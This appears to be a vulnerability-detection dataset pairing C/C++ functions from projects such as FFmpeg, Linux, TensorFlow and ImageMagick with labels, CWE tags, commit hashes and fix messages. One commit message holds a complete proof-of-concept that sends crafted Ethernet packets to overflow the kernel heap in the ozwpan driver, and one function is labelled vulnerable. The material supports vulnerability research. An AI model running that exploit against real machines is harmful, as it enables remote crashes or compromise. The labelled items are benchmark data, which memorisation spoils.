static int decode_frame(AVCodecContext *avctx, void *data, int *got_frame,
AVPacket *avpkt)
{
AVFrame *pic = data;
const uint8_t *src = avpkt->data;
int ret;
if (avpkt->size < 16) {
av_log(avctx, AV_LOG_ERROR, "packet too small\n");
return AVERROR_INVALIDDATA;
}
switch (AV_RB32(src)) {
case 0x01000001:
ret = dxtory_decode_v1_rgb(avctx, pic, src + 16, avpkt->size - 16,
AV_PIX_FMT_BGR24, 3);
break;
case 0x01000009:
ret = dxtory_decode_v2_rgb(avctx, pic, src + 16, avpkt->size - 16);
break;
case 0x02000001:
ret = dxtory_decode_v1_420(avctx, pic, src + 16, avpkt->size - 16);
break;
case 0x02000009:
ret = dxtory_decode_v2_420(avctx, pic, src + 16, avpkt->size - 16);
break;
case 0x03000001:
ret = dxtory_decode_v1_410(avctx, pic, src + 16, avpkt->size - 16);
break;
case 0x03000009:
ret = dxtory_decode_v2_410(avctx, pic, src + 16, avpkt->size - 16);
break;
case 0x04000001:
ret = dxtory_decode_v1_444(avctx, pic, src + 16, avpkt->size - 16);
break;
case 0x04000009:
ret = dxtory_decode_v2_444(avctx, pic, src + 16, avpkt->size - 16);
break;
case 0x17000001:
ret = dxtory_decode_v1_rgb(avctx, pic, src + 16, avpkt->size - 16,
AV_PIX_FMT_RGB565LE, 2);
break;
case 0x17000009:
ret = dxtory_decode_v2_565(avctx, pic, src + 16, avpkt->size - 16, 1);
break;
case 0x18000001:
case 0x19000001:
ret = dxtory_decode_v1_rgb(avctx, pic, src + 16, avpkt->size - 16,
AV_PIX_FMT_RGB555LE, 2);
break;
case 0x18000009:
case 0x19000009:
ret = dxtory_decode_v2_565(avctx, pic, src + 16, avpkt->size - 16, 0);
break;
default:
avpriv_request_sample(avctx, "Frame header %X", AV_RB32(src));
return AVERROR_PATCHWELCOME;
}
if (ret)
return ret;
pic->pict_type = AV_PICTURE_TYPE_I;
pic->key_frame = 1;
*got_frame = 1;
return avpkt->size;
}
| 0 |
[
"CWE-190"
] |
FFmpeg
|
a392bf657015c9a79a5a13adfbfb15086c1943b9
| 336,721,304,930,090,820,000,000,000,000,000,000,000 | 68 |
avcodec/dxtory: fix src size checks
Fixes integer overflow
Fixes out of array read
Fixes: d104661bb59b202df7671fb19a00ca6c-asan_heap-oob_d6429d_5066_cov_1729501105_dxtory_mic.avi
Found-by: Mateusz "j00ru" Jurczyk and Gynvael Coldwind
Signed-off-by: Michael Niedermayer <[email protected]>
|
static int uvesafb_helper_start(void)
{
char *envp[] = {
"HOME=/",
"PATH=/sbin:/bin",
NULL,
};
char *argv[] = {
v86d_path,
NULL,
};
return call_usermodehelper(v86d_path, argv, envp, UMH_WAIT_PROC);
}
| 0 |
[
"CWE-190"
] |
linux
|
9f645bcc566a1e9f921bdae7528a01ced5bc3713
| 50,823,883,515,396,070,000,000,000,000,000,000,000 | 15 |
video: uvesafb: Fix integer overflow in allocation
cmap->len can get close to INT_MAX/2, allowing for an integer overflow in
allocation. This uses kmalloc_array() instead to catch the condition.
Reported-by: Dr Silvio Cesare of InfoSect <[email protected]>
Fixes: 8bdb3a2d7df48 ("uvesafb: the driver core")
Cc: [email protected]
Signed-off-by: Kees Cook <[email protected]>
|
nfsd4_read(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
struct nfsd4_read *read)
{
__be32 status;
read->rd_filp = NULL;
if (read->rd_offset >= OFFSET_MAX)
return nfserr_inval;
/*
* If we do a zero copy read, then a client will see read data
* that reflects the state of the file *after* performing the
* following compound.
*
* To ensure proper ordering, we therefore turn off zero copy if
* the client wants us to do more in this compound:
*/
if (!nfsd4_last_compound_op(rqstp))
clear_bit(RQ_SPLICE_OK, &rqstp->rq_flags);
/* check stateid */
status = nfs4_preprocess_stateid_op(rqstp, cstate, &cstate->current_fh,
&read->rd_stateid, RD_STATE,
&read->rd_filp, &read->rd_tmp_file);
if (status) {
dprintk("NFSD: nfsd4_read: couldn't process stateid!\n");
goto out;
}
status = nfs_ok;
out:
read->rd_rqstp = rqstp;
read->rd_fhp = &cstate->current_fh;
return status;
}
| 0 |
[
"CWE-20",
"CWE-129"
] |
linux
|
b550a32e60a4941994b437a8d662432a486235a5
| 254,355,203,148,609,500,000,000,000,000,000,000,000 | 34 |
nfsd: fix undefined behavior in nfsd4_layout_verify
UBSAN: Undefined behaviour in fs/nfsd/nfs4proc.c:1262:34
shift exponent 128 is too large for 32-bit type 'int'
Depending on compiler+architecture, this may cause the check for
layout_type to succeed for overly large values (which seems to be the
case with amd64). The large value will be later used in de-referencing
nfsd4_layout_ops for function pointers.
Reported-by: Jani Tuovila <[email protected]>
Signed-off-by: Ari Kauppi <[email protected]>
[[email protected]: use LAYOUT_TYPE_MAX instead of 32]
Cc: [email protected]
Reviewed-by: Dan Carpenter <[email protected]>
Reviewed-by: Christoph Hellwig <[email protected]>
Signed-off-by: J. Bruce Fields <[email protected]>
|
TfLiteQuantizationParams GetLegacyQuantization(
const TfLiteQuantization& quantization) {
TfLiteQuantizationParams legacy_quantization;
legacy_quantization.scale = 0;
legacy_quantization.zero_point = 0;
// If the quantization type isn't affine, return the empty
// legacy_quantization.
if (quantization.type != kTfLiteAffineQuantization) {
return legacy_quantization;
}
auto* affine_quantization =
static_cast<TfLiteAffineQuantization*>(quantization.params);
if (!affine_quantization || !affine_quantization->scale ||
!affine_quantization->zero_point ||
affine_quantization->scale->size != 1 ||
affine_quantization->zero_point->size != 1) {
return legacy_quantization;
}
// We know its per-layer quantization now.
legacy_quantization.scale = affine_quantization->scale->data[0];
legacy_quantization.zero_point = affine_quantization->zero_point->data[0];
return legacy_quantization;
}
| 0 |
[
"CWE-20",
"CWE-787"
] |
tensorflow
|
d58c96946b2880991d63d1dacacb32f0a4dfa453
| 148,341,659,251,077,360,000,000,000,000,000,000,000 | 26 |
[tflite] Ensure inputs and outputs don't overlap.
If a model uses the same tensor for both an input and an output then this can result in data loss and memory corruption. This should not happen.
PiperOrigin-RevId: 332522916
Change-Id: If0905b142415a9dfceaf2d181872f2a8fb88f48a
|
pubkey_string (PKT_public_key *pk, char *buffer, size_t bufsize)
{
const char *prefix = NULL;
if (opt.legacy_list_mode)
{
snprintf (buffer, bufsize, "%4u%c",
nbits_from_pk (pk), pubkey_letter (pk->pubkey_algo));
return buffer;
}
switch (pk->pubkey_algo)
{
case PUBKEY_ALGO_RSA:
case PUBKEY_ALGO_RSA_E:
case PUBKEY_ALGO_RSA_S: prefix = "rsa"; break;
case PUBKEY_ALGO_ELGAMAL_E: prefix = "elg"; break;
case PUBKEY_ALGO_DSA: prefix = "dsa"; break;
case PUBKEY_ALGO_ELGAMAL: prefix = "xxx"; break;
case PUBKEY_ALGO_ECDH:
case PUBKEY_ALGO_ECDSA:
case PUBKEY_ALGO_EDDSA: prefix = ""; break;
}
if (prefix && *prefix)
snprintf (buffer, bufsize, "%s%u", prefix, nbits_from_pk (pk));
else if (prefix)
{
char *curve = openpgp_oid_to_str (pk->pkey[0]);
const char *name = openpgp_oid_to_curve (curve);
if (*name && *name != '?')
snprintf (buffer, bufsize, "%s", name);
else if (curve)
snprintf (buffer, bufsize, "E_%s", curve);
else
snprintf (buffer, bufsize, "E_error");
xfree (curve);
}
else
snprintf (buffer, bufsize, "unknown_%u", (unsigned int)pk->pubkey_algo);
return buffer;
}
| 0 |
[
"CWE-20"
] |
gnupg
|
2183683bd633818dd031b090b5530951de76f392
| 49,937,061,578,446,130,000,000,000,000,000,000,000 | 44 |
Use inline functions to convert buffer data to scalars.
* common/host2net.h (buf16_to_ulong, buf16_to_uint): New.
(buf16_to_ushort, buf16_to_u16): New.
(buf32_to_size_t, buf32_to_ulong, buf32_to_uint, buf32_to_u32): New.
--
Commit 91b826a38880fd8a989318585eb502582636ddd8 was not enough to
avoid all sign extension on shift problems. Hanno Böck found a case
with an invalid read due to this problem. To fix that once and for
all almost all uses of "<< 24" and "<< 8" are changed by this patch to
use an inline function from host2net.h.
Signed-off-by: Werner Koch <[email protected]>
|
static int parse_txq_params(struct nlattr *tb[],
struct ieee80211_txq_params *txq_params)
{
if (!tb[NL80211_TXQ_ATTR_QUEUE] || !tb[NL80211_TXQ_ATTR_TXOP] ||
!tb[NL80211_TXQ_ATTR_CWMIN] || !tb[NL80211_TXQ_ATTR_CWMAX] ||
!tb[NL80211_TXQ_ATTR_AIFS])
return -EINVAL;
txq_params->queue = nla_get_u8(tb[NL80211_TXQ_ATTR_QUEUE]);
txq_params->txop = nla_get_u16(tb[NL80211_TXQ_ATTR_TXOP]);
txq_params->cwmin = nla_get_u16(tb[NL80211_TXQ_ATTR_CWMIN]);
txq_params->cwmax = nla_get_u16(tb[NL80211_TXQ_ATTR_CWMAX]);
txq_params->aifs = nla_get_u8(tb[NL80211_TXQ_ATTR_AIFS]);
return 0;
}
| 0 |
[
"CWE-362",
"CWE-119"
] |
linux
|
208c72f4fe44fe09577e7975ba0e7fa0278f3d03
| 252,636,950,755,671,120,000,000,000,000,000,000,000 | 16 |
nl80211: fix check for valid SSID size in scan operations
In both trigger_scan and sched_scan operations, we were checking for
the SSID length before assigning the value correctly. Since the
memory was just kzalloc'ed, the check was always failing and SSID with
over 32 characters were allowed to go through.
This was causing a buffer overflow when copying the actual SSID to the
proper place.
This bug has been there since 2.6.29-rc4.
Cc: [email protected]
Signed-off-by: Luciano Coelho <[email protected]>
Signed-off-by: John W. Linville <[email protected]>
|
bool test_r_str_split(void) {
char* hi = strdup ("hello world");
int r = r_str_split (hi, ' ');
mu_assert_eq (r, 2, "split on space");
char* hello = hi;
char* world = hi + 6;
mu_assert_streq (hello, "hello", "first string in split");
mu_assert_streq (world, "world", "second string in split");
free (hi);
mu_end;
}
| 0 |
[
"CWE-78"
] |
radare2
|
04edfa82c1f3fa2bc3621ccdad2f93bdbf00e4f9
| 310,006,023,020,054,320,000,000,000,000,000,000,000 | 11 |
Fix command injection on PDB download (#16966)
* Fix r_sys_mkdirp with absolute path on Windows
* Fix build with --with-openssl
* Use RBuffer in r_socket_http_answer()
* r_socket_http_answer: Fix read for big responses
* Implement r_str_escape_sh()
* Cleanup r_socket_connect() on Windows
* Fix socket being created without a protocol
* Fix socket connect with SSL ##socket
* Use select() in r_socket_ready()
* Fix read failing if received only protocol answer
* Fix double-free
* r_socket_http_get: Fail if req. SSL with no support
* Follow redirects in r_socket_http_answer()
* Fix r_socket_http_get result length with R2_CURL=1
* Also follow redirects
* Avoid using curl for downloading PDBs
* Use r_socket_http_get() on UNIXs
* Use WinINet API on Windows for r_socket_http_get()
* Fix command injection
* Fix r_sys_cmd_str_full output for binary data
* Validate GUID on PDB download
* Pass depth to socket_http_get_recursive()
* Remove 'r_' and '__' from static function names
* Fix is_valid_guid
* Fix for comments
|
static void oz_acquire_port(struct oz_port *port, void *hpd)
{
INIT_LIST_HEAD(&port->isoc_out_ep);
INIT_LIST_HEAD(&port->isoc_in_ep);
port->flags |= OZ_PORT_F_PRESENT | OZ_PORT_F_CHANGED;
port->status |= USB_PORT_STAT_CONNECTION |
(USB_PORT_STAT_C_CONNECTION << 16);
oz_usb_get(hpd);
port->hpd = hpd;
}
| 0 |
[
"CWE-703",
"CWE-189"
] |
linux
|
b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c
| 61,691,817,005,750,610,000,000,000,000,000,000,000 | 10 |
ozwpan: Use unsigned ints to prevent heap overflow
Using signed integers, the subtraction between required_size and offset
could wind up being negative, resulting in a memcpy into a heap buffer
with a negative length, resulting in huge amounts of network-supplied
data being copied into the heap, which could potentially lead to remote
code execution.. This is remotely triggerable with a magic packet.
A PoC which obtains DoS follows below. It requires the ozprotocol.h file
from this module.
=-=-=-=-=-=
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <endian.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define __packed __attribute__((__packed__))
#include "ozprotocol.h"
static int hex2num(char c)
{
if (c >= '0' && c <= '9')
return c - '0';
if (c >= 'a' && c <= 'f')
return c - 'a' + 10;
if (c >= 'A' && c <= 'F')
return c - 'A' + 10;
return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
int i;
for (i = 0; i < 6; i++) {
int a, b;
a = hex2num(*txt++);
if (a < 0)
return -1;
b = hex2num(*txt++);
if (b < 0)
return -1;
*addr++ = (a << 4) | b;
if (i < 5 && *txt++ != ':')
return -1;
}
return 0;
}
int main(int argc, char *argv[])
{
if (argc < 3) {
fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
return 1;
}
uint8_t dest_mac[6];
if (hwaddr_aton(argv[2], dest_mac)) {
fprintf(stderr, "Invalid mac address.\n");
return 1;
}
int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (sockfd < 0) {
perror("socket");
return 1;
}
struct ifreq if_idx;
int interface_index;
strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
perror("SIOCGIFINDEX");
return 1;
}
interface_index = if_idx.ifr_ifindex;
if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
perror("SIOCGIFHWADDR");
return 1;
}
uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_elt_connect_req oz_elt_connect_req;
} __packed connect_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(0)
},
.oz_elt = {
.type = OZ_ELT_CONNECT_REQ,
.length = sizeof(struct oz_elt_connect_req)
},
.oz_elt_connect_req = {
.mode = 0,
.resv1 = {0},
.pd_info = 0,
.session_id = 0,
.presleep = 35,
.ms_isoc_latency = 0,
.host_vendor = 0,
.keep_alive = 0,
.apps = htole16((1 << OZ_APPID_USB) | 0x1),
.max_len_div16 = 0,
.ms_per_isoc = 0,
.up_audio_buf = 0,
.ms_per_elt = 0
}
};
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_get_desc_rsp oz_get_desc_rsp;
} __packed pwn_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(1)
},
.oz_elt = {
.type = OZ_ELT_APP_DATA,
.length = sizeof(struct oz_get_desc_rsp)
},
.oz_get_desc_rsp = {
.app_id = OZ_APPID_USB,
.elt_seq_num = 0,
.type = OZ_GET_DESC_RSP,
.req_id = 0,
.offset = htole16(2),
.total_size = htole16(1),
.rcode = 0,
.data = {0}
}
};
struct sockaddr_ll socket_address = {
.sll_ifindex = interface_index,
.sll_halen = ETH_ALEN,
.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
};
if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
usleep(300000);
if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
return 0;
}
Signed-off-by: Jason A. Donenfeld <[email protected]>
Acked-by: Dan Carpenter <[email protected]>
Cc: stable <[email protected]>
Signed-off-by: Greg Kroah-Hartman <[email protected]>
|
static int sev_guest_init(struct kvm *kvm, struct kvm_sev_cmd *argp)
{
struct kvm_sev_info *sev = &to_kvm_svm(kvm)->sev_info;
int asid, ret;
ret = -EBUSY;
if (unlikely(sev->active))
return ret;
asid = sev_asid_new();
if (asid < 0)
return ret;
ret = sev_platform_init(&argp->error);
if (ret)
goto e_free;
sev->active = true;
sev->asid = asid;
INIT_LIST_HEAD(&sev->regions_list);
return 0;
e_free:
sev_asid_free(asid);
return ret;
}
| 0 |
[
"CWE-401"
] |
linux
|
d80b64ff297e40c2b6f7d7abc1b3eba70d22a068
| 112,816,211,679,516,450,000,000,000,000,000,000,000 | 27 |
KVM: SVM: Fix potential memory leak in svm_cpu_init()
When kmalloc memory for sd->sev_vmcbs failed, we forget to free the page
held by sd->save_area. Also get rid of the var r as '-ENOMEM' is actually
the only possible outcome here.
Reviewed-by: Liran Alon <[email protected]>
Reviewed-by: Vitaly Kuznetsov <[email protected]>
Signed-off-by: Miaohe Lin <[email protected]>
Signed-off-by: Paolo Bonzini <[email protected]>
|
has_column_privilege_id_name(PG_FUNCTION_ARGS)
{
Oid tableoid = PG_GETARG_OID(0);
text *column = PG_GETARG_TEXT_P(1);
text *priv_type_text = PG_GETARG_TEXT_P(2);
Oid roleid;
AttrNumber colattnum;
AclMode mode;
int privresult;
roleid = GetUserId();
colattnum = convert_column_name(tableoid, column);
mode = convert_column_priv_string(priv_type_text);
privresult = column_privilege_check(tableoid, colattnum, roleid, mode);
if (privresult < 0)
PG_RETURN_NULL();
PG_RETURN_BOOL(privresult);
}
| 0 |
[
"CWE-264"
] |
postgres
|
fea164a72a7bfd50d77ba5fb418d357f8f2bb7d0
| 42,753,953,224,791,890,000,000,000,000,000,000,000 | 19 |
Shore up ADMIN OPTION restrictions.
Granting a role without ADMIN OPTION is supposed to prevent the grantee
from adding or removing members from the granted role. Issuing SET ROLE
before the GRANT bypassed that, because the role itself had an implicit
right to add or remove members. Plug that hole by recognizing that
implicit right only when the session user matches the current role.
Additionally, do not recognize it during a security-restricted operation
or during execution of a SECURITY DEFINER function. The restriction on
SECURITY DEFINER is not security-critical. However, it seems best for a
user testing his own SECURITY DEFINER function to see the same behavior
others will see. Back-patch to 8.4 (all supported versions).
The SQL standards do not conflate roles and users as PostgreSQL does;
only SQL roles have members, and only SQL users initiate sessions. An
application using PostgreSQL users and roles as SQL users and roles will
never attempt to grant membership in the role that is the session user,
so the implicit right to add or remove members will never arise.
The security impact was mostly that a role member could revoke access
from others, contrary to the wishes of his own grantor. Unapproved role
member additions are less notable, because the member can still largely
achieve that by creating a view or a SECURITY DEFINER function.
Reviewed by Andres Freund and Tom Lane. Reported, independently, by
Jonas Sundman and Noah Misch.
Security: CVE-2014-0060
|
ipmi_lan_alert_print_all(struct ipmi_intf * intf, uint8_t channel)
{
int j, ndest;
struct lan_param * p;
p = get_lan_param(intf, channel, IPMI_LANP_NUM_DEST);
if (!p)
return -1;
if (!p->data)
return -1;
ndest = p->data[0] & 0xf;
for (j=0; j<=ndest; j++) {
ipmi_lan_alert_print(intf, channel, j);
}
return 0;
}
| 0 |
[
"CWE-120"
] |
ipmitool
|
d45572d71e70840e0d4c50bf48218492b79c1a10
| 295,921,011,102,040,380,000,000,000,000,000,000,000 | 18 |
lanp: Fix buffer overflows in get_lan_param_select
Partial fix for CVE-2020-5208, see
https://github.com/ipmitool/ipmitool/security/advisories/GHSA-g659-9qxw-p7cp
The `get_lan_param_select` function is missing a validation check on the
response’s `data_len`, which it then returns to caller functions, where
stack buffer overflow can occur.
|
static Image *ReadPWPImage(const ImageInfo *image_info,ExceptionInfo *exception)
{
char
filename[MaxTextExtent];
FILE
*file;
Image
*image,
*next_image,
*pwp_image;
ImageInfo
*read_info;
int
c,
unique_file;
MagickBooleanType
status;
register Image
*p;
register ssize_t
i;
size_t
filesize,
length;
ssize_t
count;
unsigned char
magick[MaxTextExtent];
/*
Open image file.
*/
assert(image_info != (const ImageInfo *) NULL);
assert(image_info->signature == MagickCoreSignature);
if (image_info->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",
image_info->filename);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
image=AcquireImage(image_info);
status=OpenBlob(image_info,image,ReadBinaryBlobMode,exception);
if (status == MagickFalse)
{
image=DestroyImage(image);
return((Image *) NULL);
}
pwp_image=image;
memset(magick,0,sizeof(magick));
count=ReadBlob(pwp_image,5,magick);
if ((count != 5) || (LocaleNCompare((char *) magick,"SFW95",5) != 0))
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
read_info=CloneImageInfo(image_info);
(void) SetImageInfoProgressMonitor(read_info,(MagickProgressMonitor) NULL,
(void *) NULL);
SetImageInfoBlob(read_info,(void *) NULL,0);
unique_file=AcquireUniqueFileResource(filename);
(void) FormatLocaleString(read_info->filename,MagickPathExtent,"sfw:%s",
filename);
for ( ; ; )
{
(void) memset(magick,0,sizeof(magick));
for (c=ReadBlobByte(pwp_image); c != EOF; c=ReadBlobByte(pwp_image))
{
for (i=0; i < 17; i++)
magick[i]=magick[i+1];
magick[17]=(unsigned char) c;
if (LocaleNCompare((char *) (magick+12),"SFW94A",6) == 0)
break;
}
if (c == EOF)
{
(void) RelinquishUniqueFileResource(filename);
read_info=DestroyImageInfo(read_info);
ThrowReaderException(CorruptImageError,"UnexpectedEndOfFile");
}
if (LocaleNCompare((char *) (magick+12),"SFW94A",6) != 0)
{
(void) RelinquishUniqueFileResource(filename);
read_info=DestroyImageInfo(read_info);
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
}
/*
Dump SFW image to a temporary file.
*/
file=(FILE *) NULL;
if (unique_file != -1)
file=fdopen(unique_file,"wb");
if ((unique_file == -1) || (file == (FILE *) NULL))
{
(void) RelinquishUniqueFileResource(filename);
read_info=DestroyImageInfo(read_info);
ThrowFileException(exception,FileOpenError,"UnableToWriteFile",
image->filename);
image=DestroyImageList(image);
return((Image *) NULL);
}
length=fwrite("SFW94A",1,6,file);
(void) length;
filesize=65535UL*magick[2]+256L*magick[1]+magick[0];
for (i=0; i < (ssize_t) filesize; i++)
{
c=ReadBlobByte(pwp_image);
if (c == EOF)
break;
(void) fputc(c,file);
}
(void) fclose(file);
if (c == EOF)
{
(void) RelinquishUniqueFileResource(filename);
read_info=DestroyImageInfo(read_info);
ThrowReaderException(CorruptImageError,"UnexpectedEndOfFile");
}
next_image=ReadImage(read_info,exception);
if (next_image == (Image *) NULL)
break;
(void) FormatLocaleString(next_image->filename,MaxTextExtent,
"slide_%02ld.sfw",(long) next_image->scene);
if (image == (Image *) NULL)
image=next_image;
else
{
/*
Link image into image list.
*/
for (p=image; p->next != (Image *) NULL; p=GetNextImageInList(p)) ;
next_image->previous=p;
next_image->scene=p->scene+1;
p->next=next_image;
}
if (image_info->number_scenes != 0)
if (next_image->scene >= (image_info->scene+image_info->number_scenes-1))
break;
status=SetImageProgress(image,LoadImagesTag,TellBlob(pwp_image),
GetBlobSize(pwp_image));
if (status == MagickFalse)
break;
}
if (unique_file != -1)
(void) close(unique_file);
(void) RelinquishUniqueFileResource(filename);
read_info=DestroyImageInfo(read_info);
if (image != (Image *) NULL)
{
if (EOFBlob(image) != MagickFalse)
{
char
*message;
message=GetExceptionMessage(errno);
(void) ThrowMagickException(exception,GetMagickModule(),
CorruptImageError,"UnexpectedEndOfFile","`%s': %s",image->filename,
message);
message=DestroyString(message);
}
(void) CloseBlob(image);
}
return(GetFirstImageInList(image));
}
| 1 |
[
"CWE-252"
] |
ImageMagick6
|
11d9dac3d991c62289d1ef7a097670166480e76c
| 55,802,806,649,703,300,000,000,000,000,000,000,000 | 169 |
https://github.com/ImageMagick/ImageMagick/issues/1199
|
static int snd_seq_ioctl_get_queue_tempo(struct snd_seq_client *client,
void *arg)
{
struct snd_seq_queue_tempo *tempo = arg;
struct snd_seq_queue *queue;
struct snd_seq_timer *tmr;
queue = queueptr(tempo->queue);
if (queue == NULL)
return -EINVAL;
memset(tempo, 0, sizeof(*tempo));
tempo->queue = queue->queue;
tmr = queue->timer;
tempo->tempo = tmr->tempo;
tempo->ppq = tmr->ppq;
tempo->skew_value = tmr->skew;
tempo->skew_base = tmr->skew_base;
queuefree(queue);
return 0;
}
| 0 |
[
"CWE-416",
"CWE-362"
] |
linux
|
71105998845fb012937332fe2e806d443c09e026
| 169,607,210,909,051,070,000,000,000,000,000,000,000 | 23 |
ALSA: seq: Fix use-after-free at creating a port
There is a potential race window opened at creating and deleting a
port via ioctl, as spotted by fuzzing. snd_seq_create_port() creates
a port object and returns its pointer, but it doesn't take the
refcount, thus it can be deleted immediately by another thread.
Meanwhile, snd_seq_ioctl_create_port() still calls the function
snd_seq_system_client_ev_port_start() with the created port object
that is being deleted, and this triggers use-after-free like:
BUG: KASAN: use-after-free in snd_seq_ioctl_create_port+0x504/0x630 [snd_seq] at addr ffff8801f2241cb1
=============================================================================
BUG kmalloc-512 (Tainted: G B ): kasan: bad access detected
-----------------------------------------------------------------------------
INFO: Allocated in snd_seq_create_port+0x94/0x9b0 [snd_seq] age=1 cpu=3 pid=4511
___slab_alloc+0x425/0x460
__slab_alloc+0x20/0x40
kmem_cache_alloc_trace+0x150/0x190
snd_seq_create_port+0x94/0x9b0 [snd_seq]
snd_seq_ioctl_create_port+0xd1/0x630 [snd_seq]
snd_seq_do_ioctl+0x11c/0x190 [snd_seq]
snd_seq_ioctl+0x40/0x80 [snd_seq]
do_vfs_ioctl+0x54b/0xda0
SyS_ioctl+0x79/0x90
entry_SYSCALL_64_fastpath+0x16/0x75
INFO: Freed in port_delete+0x136/0x1a0 [snd_seq] age=1 cpu=2 pid=4717
__slab_free+0x204/0x310
kfree+0x15f/0x180
port_delete+0x136/0x1a0 [snd_seq]
snd_seq_delete_port+0x235/0x350 [snd_seq]
snd_seq_ioctl_delete_port+0xc8/0x180 [snd_seq]
snd_seq_do_ioctl+0x11c/0x190 [snd_seq]
snd_seq_ioctl+0x40/0x80 [snd_seq]
do_vfs_ioctl+0x54b/0xda0
SyS_ioctl+0x79/0x90
entry_SYSCALL_64_fastpath+0x16/0x75
Call Trace:
[<ffffffff81b03781>] dump_stack+0x63/0x82
[<ffffffff81531b3b>] print_trailer+0xfb/0x160
[<ffffffff81536db4>] object_err+0x34/0x40
[<ffffffff815392d3>] kasan_report.part.2+0x223/0x520
[<ffffffffa07aadf4>] ? snd_seq_ioctl_create_port+0x504/0x630 [snd_seq]
[<ffffffff815395fe>] __asan_report_load1_noabort+0x2e/0x30
[<ffffffffa07aadf4>] snd_seq_ioctl_create_port+0x504/0x630 [snd_seq]
[<ffffffffa07aa8f0>] ? snd_seq_ioctl_delete_port+0x180/0x180 [snd_seq]
[<ffffffff8136be50>] ? taskstats_exit+0xbc0/0xbc0
[<ffffffffa07abc5c>] snd_seq_do_ioctl+0x11c/0x190 [snd_seq]
[<ffffffffa07abd10>] snd_seq_ioctl+0x40/0x80 [snd_seq]
[<ffffffff8136d433>] ? acct_account_cputime+0x63/0x80
[<ffffffff815b515b>] do_vfs_ioctl+0x54b/0xda0
.....
We may fix this in a few different ways, and in this patch, it's fixed
simply by taking the refcount properly at snd_seq_create_port() and
letting the caller unref the object after use. Also, there is another
potential use-after-free by sprintf() call in snd_seq_create_port(),
and this is moved inside the lock.
This fix covers CVE-2017-15265.
Reported-and-tested-by: Michael23 Yu <[email protected]>
Suggested-by: Linus Torvalds <[email protected]>
Cc: <[email protected]>
Signed-off-by: Takashi Iwai <[email protected]>
|
static void hns_xgmac_config_pad_and_crc(void *mac_drv, u8 newval)
{
struct mac_driver *drv = (struct mac_driver *)mac_drv;
u32 origin = dsaf_read_dev(drv, XGMAC_MAC_CONTROL_REG);
dsaf_set_bit(origin, XGMAC_CTL_TX_PAD_B, !!newval);
dsaf_set_bit(origin, XGMAC_CTL_TX_FCS_B, !!newval);
dsaf_set_bit(origin, XGMAC_CTL_RX_FCS_B, !!newval);
dsaf_write_dev(drv, XGMAC_MAC_CONTROL_REG, origin);
}
| 0 |
[
"CWE-119",
"CWE-703"
] |
linux
|
412b65d15a7f8a93794653968308fc100f2aa87c
| 39,785,902,302,672,044,000,000,000,000,000,000,000 | 10 |
net: hns: fix ethtool_get_strings overflow in hns driver
hns_get_sset_count() returns HNS_NET_STATS_CNT and the data space allocated
is not enough for ethtool_get_strings(), which will cause random memory
corruption.
When SLAB and DEBUG_SLAB are both enabled, memory corruptions like the
the following can be observed without this patch:
[ 43.115200] Slab corruption (Not tainted): Acpi-ParseExt start=ffff801fb0b69030, len=80
[ 43.115206] Redzone: 0x9f911029d006462/0x5f78745f31657070.
[ 43.115208] Last user: [<5f7272655f746b70>](0x5f7272655f746b70)
[ 43.115214] 010: 70 70 65 31 5f 74 78 5f 70 6b 74 00 6b 6b 6b 6b ppe1_tx_pkt.kkkk
[ 43.115217] 030: 70 70 65 31 5f 74 78 5f 70 6b 74 5f 6f 6b 00 6b ppe1_tx_pkt_ok.k
[ 43.115218] Next obj: start=ffff801fb0b69098, len=80
[ 43.115220] Redzone: 0x706d655f6f666966/0x9f911029d74e35b.
[ 43.115229] Last user: [<ffff0000084b11b0>](acpi_os_release_object+0x28/0x38)
[ 43.115231] 000: 74 79 00 6b 6b 6b 6b 6b 70 70 65 31 5f 74 78 5f ty.kkkkkppe1_tx_
[ 43.115232] 010: 70 6b 74 5f 65 72 72 5f 63 73 75 6d 5f 66 61 69 pkt_err_csum_fai
Signed-off-by: Timmy Li <[email protected]>
